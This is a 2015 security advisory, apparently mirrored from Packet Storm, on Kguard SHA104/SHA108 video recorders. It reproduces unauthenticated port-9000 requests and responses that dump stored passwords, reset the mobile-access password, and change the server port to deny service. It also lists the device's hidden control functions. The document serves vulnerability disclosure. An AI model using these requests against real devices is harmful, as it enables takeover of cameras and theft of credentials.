Lucene search
K

Kguard SHA104 / SHA108 Bypass / Command Injection

🗓️ 10 Mar 2015 00:00:00Reported by Federick Joe P FajardoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 53 Views

Kguard SHA104 / SHA108 DVRs: Authentication and Authorization Vulnerabilitie

Code
`MULTIPLE VULNERABILITIES WITH KGUARD DIGITAL VIDEO RECORDERS, February 10,   
2015  
  
PRODUCT DESCRIPTION  
  
The Kguard SHA104 & SHA108 are 4ch/8ch H.264 DVRs designed for economical   
application. It's stylish & streamlines hardware design and excellent   
performance can be fast moving, competitive and an ideal solution for   
entry level & distribution channels.   
  
VENDOR REFERENCE:   
http://us.kworld-global.com/main/prod_in.aspx?mnuid=1306&modid=10&prodid=527  
  
VULNERABILITY DESCRIPTION  
  
1. Insufficient authentication and authorization  
  
A deficiency in handling authentication and authorization has been found   
with Kguard 104/108 models. While password-based authentication is used by   
the ActiveX component to protect the login page, all the communication to   
the application server at port 9000 allows data to be communicated   
directly with insufficient or improper authorization.   
The request HI_SRDK_SYS_USERMNG_GetUserList for example will show all the   
usernames in the system together with their passwords. The below example   
is an actual unmodified request and response by the server.   
  
REMOTE HI_SRDK_SYS_USERMNG_GetUserList MCTP/1.0   
CSeq:6   
Accept:text/HDP   
Content-Type:text/HDP   
Func-Version:0x10   
Content-Length:51   
3Segment-Num:1   
Segment-Seq:1   
Data-Length:4  
  
VMCTP/1.0 200 OK   
Content-Type:text/HDP   
CSeq:6   
Return-Code:0   
Content-Length:2326   
Segment-Num:2   
Segment-Seq:1   
Data-Length:2240   
eric   
111222   
111222   
admin   
111222   
111222   
333444   
333444   
555666   
555666   
user4   
user5   
user6   
Segment-Seq:2   
Data-Length:4  
  
An interesting request is HI_SRDK_NET_MOBILE_GetOwspAttr. If configured,   
this allows mobile devices to access and monitor the cameras at port   
18004. An actual unmodified request and response is shown below.  
  
REMOTE HI_SRDK_NET_MOBILE_GetOwspAttr MCTP/1.0   
CSeq:15   
Accept:text/HDP   
Content-Type:text/HDP   
Func-Version:0x10   
Content-Length:15   
Segment-Num:0  
  
VMCTP/1.0 200 OK   
Content-Type:text/HDP   
CSeq:15   
Return-Code:0   
Content-Length:161   
Segment-Num:1   
Segment-Seq:1   
Data-Length:112   
admin   
111222  
  
The password to this user can be changed easily by executing the   
HI_SRDK_NET_MOBILE_SetOwspAttr request as shown below and can be saved in   
memory by executing HI_SRDK_DEV_SaveFlash:  
  
REMOTE HI_SRDK_NET_MOBILE_SetOwspAttr MCTP/1.0  
CSeq:1  
Accept:text/HDP  
Content-Type:text/HDP  
Func-Version:0x10  
Content-Length:161  
  
Segment-Num:1  
Segment-Seq:1  
Data-Length:112  
  
admin.t..|A<.......n(...........111222444.eted!.p.c<.... ...   
...TF..............................................  
  
The logs from the application server can confirm that the execution was   
successful:  
  
[MCTP] [HI_MCTP_MethodProc_Remote] SUCCESS!!!!!   
/home/yala/svn/D9108_MLANG_QSEE/dvr/modules/vscp/mctp/server/hi_vscp_mctp_mthdproc.c   
  
606========================  
  
GetNetworkState:192.168.254.200  
  
Logs from the DVR also shows that an existing mobile device that tries to   
connect on port 18004 with previous credentials stored will fail:   
  
< StreamingServer> [ run] A   
client(116) connected[2010-09-11 12:30].  
< LangtaoCommProto> [ handlePacketBody] Input   
buffer total length: 60  
< LangtaoCommProto> [ handlePacketBody] tlv type:   
41  
< LangtaoCommProto> [ handlePacketBody] tlv   
length: 56  
< LangtaoCommProto> [ handlePacketBody] Login   
request received.  
< LangtaoCommProto> [ handleLoginReq] User Name:   
  
admin Passwrod: 111222  
< LangtaoCommProto> [ handleLoginReq] User name   
and/or password validate fail.  
< StreamingServer> [ handleRequest2] Send   
response to client.  
< StreamingServer> [ handleRequest2] Session   
closed actively.  
< StreamingServer> [ run] Handle   
request fail.  
----------------------- SESSION(116) END -----------------------  
  
2. Lack of transport security  
  
The communication to the application server is done by an unprotected   
ActiveX component that is presented to the browser's initial session. The   
lack of transport encryption may allow us to exploit possible request from   
this component to the application server. This file is named as   
HiDvrOcx.cab.   
  
Decompiling the file will allow us to see the libraries being used:  
  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443576 Mar 11 2011 HiDvrOcx.ocx  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 1443 Mar 11 2011 HiDvrOcx.inf  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 27136 Mar 11 2011 HiDvrOcxESN.dll  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxITA.dll  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 26624 Mar 11 2011 HiDvrOcxBRG.dll  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 20992 Mar 11 2011 HiDvrOcxJPN.dll  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 155648 Mar 11 2011 HiDvrNet.dll  
-rw-rw-r--. 1 fjpfajardo fjpfajardo 487525 Mar 11 2011 HiDvrMedia.dll  
  
Interestingly, checking the DLL file named HiDvrNet.dll will reveal other   
types of controls which can be presented to the application server as   
well:  
  
HI_SRDK_NET_MOBILE_GetOwspAttr  
HI_SRDK_NET_MOBILE_SetAttr  
HI_SRDK_NET_MOBILE_SetOwspAttr  
HI_SRDK_NET_Network_DHCP_Client_GetAttr  
HI_SRDK_NET_Network_DHCP_Client_SetAttr  
HI_SRDK_NET_Network_GetDNSList  
HI_SRDK_NET_Network_GetDefaultGateway  
HI_SRDK_NET_Network_GetNetdevAttr  
HI_SRDK_NET_Network_GetNetdevName  
HI_SRDK_NET_Network_SetDNSList  
HI_SRDK_NET_Network_SetDefaultGateway  
HI_SRDK_NET_Network_SetNetdevAttr  
HI_SRDK_NET_SetDdnsAttr  
HI_SRDK_NET_SetEmailAttr  
HI_SRDK_NET_SetIppreviewVodAttr  
HI_SRDK_NET_SetMctpServerPort  
HI_SRDK_NET_SetPppoeAttr  
HI_SRDK_NET_SetWebServerPort  
HI_SRDK_Open_Device  
HI_SRDK_RECORDER_GetPlaybackAttr  
HI_SRDK_RECORDER_GetRecordAttr  
HI_SRDK_RECORDER_GetRecordSchedule  
HI_SRDK_RECORDER_SetPlaybackAttr  
HI_SRDK_RECORDER_SetRecordAttr  
HI_SRDK_RECORDER_SetRecordSchedule  
HI_SRDK_SYS_GetDaylightAttr  
HI_SRDK_SYS_GetSysMaintainAttr  
HI_SRDK_SYS_GetSystemAttr  
HI_SRDK_SYS_SetDaylightAttr  
HI_SRDK_SYS_SetSysMaintainAttr  
HI_SRDK_SYS_SetSystemAttr  
HI_SRDK_SYS_USERMNG_AddGroup  
HI_SRDK_SYS_USERMNG_AddUser  
HI_SRDK_SYS_USERMNG_DelGroup  
HI_SRDK_SYS_USERMNG_DelUser  
HI_SRDK_SYS_USERMNG_Disable  
HI_SRDK_SYS_USERMNG_Enable  
HI_SRDK_SYS_USERMNG_GetAuthorityList  
HI_SRDK_SYS_USERMNG_GetGroupList  
HI_SRDK_SYS_USERMNG_GetUserList  
HI_SRDK_SYS_USERMNG_ModifyGroupInfo  
HI_SRDK_SYS_USERMNG_ModifyUserInfo  
  
3. Denial of Service and Command Injection  
  
Input are not sanitized and filtered in some of the fields which may lead   
to a potential passive Denial of Service and/or command injection. By   
altering some requests such as HI_SRDK_NET_SetPppoeAttr,   
HI_SRDK_NET_Network_DHCP_Client_SetAttr, HI_SRDK_NET_SetWebServerPort or   
HI_SRDK_NET_Network_SetDefaultGateway, a malicous user may be able to   
disrupt connectivity to the DVR.  
  
REMOTE HI_SRDK_NET_SetMctpServerPort MCTP/1.0  
CSeq:58  
Accept:text/HDP  
Content-Type:text/HDP  
Func-Version:0x10  
Content-Length:49  
1Segment-Num:1  
Segment-Seq:1  
Data-Length:2  
  
REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0  
CSeq:61  
Accept:text/HDP  
Content-Type:text/HDP  
Func-Version:0x10  
Content-Length:15  
Segment-Num:0  
  
The application server that listens for incoming requests at port 9000 is   
run by a binary called raysharp_dvr which suggest that the hardware   
manufacturer is Zhuhai RaySharp Technology Co. While the purpose for this   
vulnerability analysis is mainly for Kguard related DVR's, I believe that   
other devices that use the same firmware by the manufacturer and rebranded   
in the market are also vulnerable.   
  
576 root 20696 S ./raysharp_dvr   
577 root 20696 S ./raysharp_dvr   
578 root 20696 S ./raysharp_dvr   
579 root 20696 S ./raysharp_dvr   
580 root 20696 S ./raysharp_dvr   
581 root 20696 S ./raysharp_dvr   
582 root 20696 S ./raysharp_dvr   
  
Timeline:  
  
02/07/2015 - Discovery / PoC  
02/09/2015 - Reported to vendor (NR)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation